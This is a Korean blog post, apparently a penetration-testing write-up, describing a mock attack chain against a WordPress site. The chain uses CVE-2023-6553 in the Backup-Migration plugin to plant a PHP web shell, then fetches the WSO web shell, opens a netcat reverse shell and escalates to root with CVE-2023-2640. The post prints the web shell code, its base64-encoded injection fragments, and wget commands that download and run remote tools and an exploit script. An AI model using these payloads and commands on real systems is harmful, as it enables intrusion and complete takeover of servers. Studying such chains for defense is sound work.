WEB

CVE 사용한 모의해킹 시나리오

모의해킹 2024. 1. 2. 17:08

모의해킹 시나리오

1. CVE-2023-6553을 이용한 RCE 
2. RCE로 범용성 높은 WSO 웹쉘 실행
3. 리버스 쉘(Net Cat) 사용
4. 리버스 쉘 접근 후 권한 상승 취약점 이용 CVE-2023-2640


Step 1) 취약한 WordPress Plugin 버전을 확인하였습니다.(Backup-Migration 1.3.6)

Step 2) LFI 취약점을 이용한 php_filter_chain 기법을 사용하여 웹쉘 생성 코드를 전송하였습니다.

<?php `echo -n '' > a.php`; ?> 공격 코드를 줄여 전송 시 200 OK 문구를 확인하였습니다.

Step 3) 서버 내 a.php 파일이 생성된 것을 확인하였습니다.

Step 4) 이어쓰기를 사용하여 생성된 php backdoor 내 시스템 명령어 실행 코드를 작성하였습니다.
(php_filter_chain 사용 시 base 64 인코딩 시 ==이 있으면 삭제 후 작성)

웹 쉘 코드 : <?php echo `$_GET[0]`;?>

<?php `echo -ne '<?php e' >> a.php`; ?> #PD9waHAgYGVjaG8gLW5lICc8P3BocCBlJyA+PiBhLnBocGA7ID8+

<?php `echo -ne 'cho \`$' >> a.php`; ?>  #PD9waHAgYGVjaG8gLW5lICdjaG8gXGAkJyA+PiBhLnBocGA7ID8+

<?php `echo -ne '_GET[0]' >> a.php`; ?> #PD9waHAgYGVjaG8gLW5lICdfR0VUWzBdJyA+PiBhLnBocGA7ID8+

<?php `echo -ne '\`;?>' >> a.php`; ?> #PD9waHAgYGVjaG8gLW5lICdcYDs/PicgPj4gYS5waHBgOyA/Pg

4개의 코드로 나눠 패킷을 보내 a.php 내 웹쉘 코드를 생성하였습니다.

Step 5) 웹 사이트에 접근하여 웹 쉘을 실행한 것을 확인하였습니다.

Step 6) 범용성 높은 웹쉘 다운로드를 위하여 wget 명령어를 사용하였습니다.

(wget 명령어 사용이 -b 옵션을 추가해 백그라운드 실행 시 wget 명령어 사용이 가능합니다.)

wget -b https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php

Step 7) WSO 웹쉘을 사용하여 리버스 쉘을 실행하였습니다.

Step 8) 리버스 쉘 실행 시 공격자의 서버 내 포트를 Open 하여 서버의 쉘에 접속하였습니다.

Step 9) 쉘에 접속하여, root 권한 상승 시도하였습니다.

사용한 CVE는 2023-2640입니다. 

mkdir test
wget https://raw.githubusercontent.com/OllaPapito/gameoverlay/babydoge/overlay.sh
mv overlay.sh test
chmod 777 -R test
cd test
./overlay.sh

Step 10) root 권한을 획득하였습니다.